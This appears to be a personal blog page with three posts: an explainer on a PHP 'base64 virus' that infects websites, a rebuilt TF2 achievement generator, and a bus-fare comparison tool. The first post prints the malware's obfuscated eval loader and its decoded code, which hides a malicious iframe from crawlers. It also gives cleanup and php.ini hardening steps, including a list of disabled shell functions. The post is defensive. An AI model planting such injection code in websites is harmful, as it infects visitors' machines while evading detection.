PHP Base64 Virus

You may or may not have heard of it but it’s out there…
The virus looks something like this:


<?php
    $auth_pass = "133a113117ca7d73b44ad035e570e67b";
    $virusaworm = "7X17e9q48xyv9ESAk ... maCymQa9uHCk7"; 
    eval(base64_decode($script));
    @eval(gzinflate(base64_decode($virusaworm)));
?>

And (almost) every PHP file will contain this after being infected:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDA ... XY+JzsNCn0='));

The actual code:

<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp',
...  'wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    ...
    array("38.0.0.0","38.255.255.255")
    );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
    echo '<div style="position: absolute; left: -1999px; top: -2999px;">
            <ΙFRAME src="http://example.org/QQkcEAAcDAAMBBw==" width="2" height="2"></ΙFRAME>
        </div>';
}

This means that all the pages with this code contain an invisible iframe but only when the user isn’t a bot.
That page in the iframe contains malware infecting the user.

How do we get rid of it?

in your webroot put a .htaccess file with the following content:
order deny,allow
deny from all
allow from 127.0.0.1

Now upload Trinetra v 2.0 to your webroot and execute trinetra-cleaner2.php (locally).

After you’ve done all the steps to prevent this from happening again, delete the .htaccess file.

How do we prevent it?

In your php.ini file put the following lines:
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

Remove the functions you do need, for example some template systems use eval().

Change your file permissions!

Install and configure suhosin. You can whitelist functions inside eval() so functions like base64_decode are never allowed to execute.
In that case even when some bot managed to upload the payload, it cannot be executed correctly.

 

Interesting readings

http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html
http://www.webdigi.co.uk/blog/2009/how-to-detect-if-your-webserver-is-hacked-and-get-alerted/


Achievement generator

There used to be a very pretty achievements generator at http://teamfortress2.fr/achievements.php?eng

But apparently it broke because of some missing JavaScript and CSS files.

Using archive.org I’ve managed to get those files.

Then I crammed everything together in one HTML file 🙂

http://pastehtml.com/view/cp27dx5ly.html

Mirror: http://ict-blue.be/qwaxys/projects/TF2-achievements/

Enjoy!

PS: you can just copy the HTML and run it locally or host it yourself 😉


London: There and Back Again

I like London, great city, lot’s of stuff to do. But it’s not next door so that means traveling.

I prefer traveling cheap so most of the time I use Megabus 😛 .

They’re a nice, low-budget bus company.

However their site makes it quite hard to get an overview of all the cheapest days.

So I’ve made a little tool for myself 😀

travel

http://ict-blue.be/qwaxys/projects/megabus/